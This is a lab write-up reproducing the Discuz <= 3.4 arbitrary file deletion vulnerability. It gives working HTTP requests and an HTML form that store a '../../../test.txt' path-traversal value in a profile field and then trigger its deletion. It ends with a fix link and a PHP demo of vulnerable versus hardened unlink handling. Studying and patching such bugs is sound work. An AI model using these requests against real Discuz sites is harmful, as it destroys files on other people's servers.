Preface: On September 29, Discuz fixed a front-end arbitrary file deletion vulnerability. A similar vulnerability was submitted to WooYun and to Discuz in 2014, but the incomplete fix led to this one. Many sources online say the official 3.4 version has already been fixed, but the environment I used is the 3.4 version from vulhub, so I don't know whether 3.4 is fixed or not; I just reproduced it directly.

Affected versions: Discuz <= 3.4

Environment
Reproduction steps: First, create a new file test.txt in the discuz directory; it will be the file deleted later.

Create test.txt

Visit http://192.168.220.131/home.php?mod=spacecp, then open the element inspector, find the value of formhash and copy it.

View formhash

Capture the request with Burp to obtain the cookie.

Capture the cookie

Send the packet below, replacing the cookie, formhash and the file to delete:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
Send the deletion packet

Refresh the page, and the "birthplace" field will show the state in the image below:

Data written successfully

This shows the value has been stored in the database:

Next, create an upload.html with the code below; change the IP to the discuz domain and [form-hash] to your own formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or construct the packet directly:

POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can be written here)
-----------------------------123821742118716--
Go back into the discuz directory and you can see that test.txt has been deleted.
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit the file upload/source/include/spacecp/spacecp_profile.php and remove the unlink-related code.
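As an added illustration (this is not Discuz's own code, nor the code in the linked commit), the pattern behind this bug is shown beside a hardened handler: a value read back from the user's profile row is concatenated straight into an unlink() path, so a stored "../../../test.txt" deletes a file outside the profile directory. The hardened version only deletes fields that are declared as uploads, accepts only bare file names, resolves the path with realpath() and checks that it is still under the profile directory, and logs rejected attempts so they are visible to monitoring. The function names, the $attachDir/$profile/$deleteFile/$fileFields parameters and the sample data are assumptions for this demo.

```php
<?php
// Added illustration, not Discuz's code. Names ($attachDir, $profile, $deleteFile,
// $fileFields, both function names) and the sample data are assumptions for this demo.

// The pattern behind the bug: the stored profile value is trusted as a file name and
// concatenated into the unlink() path. After a user stores "../../../test.txt" in the
// field, the delete branch removes a file far outside the profile directory.
function delete_profile_file_vulnerable(string $attachDir, array $profile, array $deleteFile): array
{
    $deleted = [];
    foreach ($deleteFile as $field => $_) {
        if (!empty($profile[$field])) {
            $path = $attachDir . '/profile/' . $profile[$field];
            if (@unlink($path)) {
                $deleted[] = $path;
            }
        }
    }
    return $deleted;
}

// Hardened handler:
//  1. only fields declared as file uploads may be deleted (allow-list);
//  2. the stored value must be a bare file name: no "/", "\", "..", or NUL;
//  3. the path is resolved with realpath() and must stay under the profile directory,
//     which also catches symlinks planted inside it;
//  4. rejected requests are logged so attempts show up in monitoring.
function delete_profile_file_safe(string $attachDir, array $profile, array $deleteFile, array $fileFields): array
{
    $base = realpath($attachDir . '/profile');
    if ($base === false) {
        return [];
    }
    $deleted = [];
    foreach ($deleteFile as $field => $_) {
        if (!in_array($field, $fileFields, true)) {
            continue;                                           // 1. not an upload field
        }
        $name = (string) ($profile[$field] ?? '');
        if ($name === '' || $name !== basename($name)
            || strpbrk($name, "/\\\0") !== false || strpos($name, '..') !== false) {
            error_log("profile delete rejected: field=$field value=" . bin2hex($name));
            continue;                                           // 2. not a bare file name
        }
        $target = realpath($base . DIRECTORY_SEPARATOR . $name);
        if ($target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
            error_log("profile delete rejected: field=$field resolved outside profile dir");
            continue;                                           // 3. escaped the base directory
        }
        if (@unlink($target)) {
            $deleted[] = $target;
        }
    }
    return $deleted;
}

// Demo in a scratch directory (constructed sample data).
$tmp = sys_get_temp_dir() . '/discuz_unlink_demo_' . getmypid();
mkdir("$tmp/profile", 0700, true);
file_put_contents("$tmp/profile/avatar_1.jpg", 'x');
file_put_contents("$tmp/secret.txt", 'x');                     // outside the profile dir

$profile    = ['birthprovince' => '../secret.txt', 'avatar' => 'avatar_1.jpg'];
$fileFields = ['avatar'];

// The traversal value is rejected: nothing is deleted and secret.txt is left in place.
var_dump(delete_profile_file_safe($tmp, $profile, ['birthprovince' => 1], $fileFields));
var_dump(file_exists("$tmp/secret.txt"));
// A genuine upload field with a bare file name is deleted inside the profile directory.
var_dump(delete_profile_file_safe($tmp, $profile, ['avatar' => 1], $fileFields));

// Clean up the scratch directory.
@unlink("$tmp/secret.txt");
@rmdir("$tmp/profile");
@rmdir($tmp);
```

Run it with `php demo.php`. The realpath() check is the one that matters in practice: the basename() and ".." tests reject the obvious traversal strings, but only resolving the path and comparing it against the resolved base directory also covers symlinks and platform-specific separators, and the error_log() calls give a SOC something to alert on.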